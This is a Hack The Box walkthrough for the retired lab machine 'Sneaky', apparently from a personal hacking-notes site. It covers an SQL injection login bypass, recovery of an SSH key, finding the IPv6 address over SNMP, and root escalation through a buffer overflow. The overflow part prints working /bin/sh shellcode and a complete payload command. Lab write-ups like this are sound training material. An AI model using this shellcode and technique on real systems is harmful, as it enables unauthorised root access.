Hacking
Github
Twitter
Search…
Hacking
Hacking, Bug Bounties & Penetration Testing
The Hacker Lab
Methodologies
Basic Buffer Overflow
Basic Internal Network test
Basic Mobile Testing guide
Basic Subdomain Enumeration guide
Guides
Build A Raspberry Pi Dropbox
Golang
Powershell / PowerView
Hack The Box last updated - 2019
Legacy
Devel
Optimum
Popcorn
Beep
Tenten
Arctic
Cronos
Grandpa
Granny
October
Lazy
Sneaky
Holiday
Blocky
Shrek
Blue
Joker
Europa
Haircut
Bank
SolidState
Mantis
Shocker
Tally
Sense
Jeeves
Stratosphere
Inception
Bashed
Fluxcapacitor
Canape
Rabbit
Chatterbox
Nibbles
Sunday
Aragog
Valentine
Silo
Olympus
Poison
Celestial
Waldo
Jerry
Access
Active
Netmon
Powered By
GitBook
Sneaky
Sneaky - 10.10.10.20
Target Enumeration:
IP: 10.10.10.20
User: 9fe14f76222db23a770f20136751bdab
Root: See screenshot
Ports / Services / Software Versions Running
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
Vulnerability Exploited:
SQLi authentication bypass
Users ssh key stored on webserver.
Privilege Escalation:
/usr/local/bin/chal is vulnerable to a buffer overflow
Exploiting the host:
Nmap
Dirb:
/dev is a login page
Intercept login request and fuzz for sql with burp intruder:
You can bypass the login with an sqli payload
Request in browser and download the key
Key contents
There is no ssh port open so need to find the IPv6 address.
Check our IPv6 address
Snmpwalk pubic string gives lots of information:
Find the IPv6 info
Convert from decimal to hex
iso.3.6.1.2.1.4.34.1.3.2.16.254.128.0.0.0.0.0.0.2.80.86.255.254.178.142.248
254.128.0.0.0.0.0.0.2.80.86.255.254.178.142.248
Convert to hex with python:
Build the address based on the same format
Dead:beef::250:56ff:feb2:8ef8
Login with ssh -6 username and key
Search for privesc
Running the file shows it could be vulnerable to a buffer overflow
Check you can overwrite:
Generate a pattern to locate offset
Dump that into the program
Query the offset
Found the offset
Build the overflow using /bin/sh as shellcode
1
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
Copied!
You will need to try various memory addresses to get this to exploit:
Open gdb and find the memory addresses:
(gdb) run AAAAAAAAAAAAAAAAAA-SNIP-AAAAAAA
Convert address to little endian
Build your payload as follows:
1
/usr/local/bin/chal $(python -c 'print "A"*362+"\xbe\xf4\xff\xbf"+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"')
Copied!
Now you have a root shell so collect the flags
Hack The Box last updated - 2019 - Previous
Lazy
Next - Hack The Box last updated - 2019
Holiday
Last modified
3yr ago
Copy link
Contents
Sneaky - 10.10.10.20
Target Enumeration:
Ports / Services / Software Versions Running
Vulnerability Exploited:
Privilege Escalation:
Exploiting the host: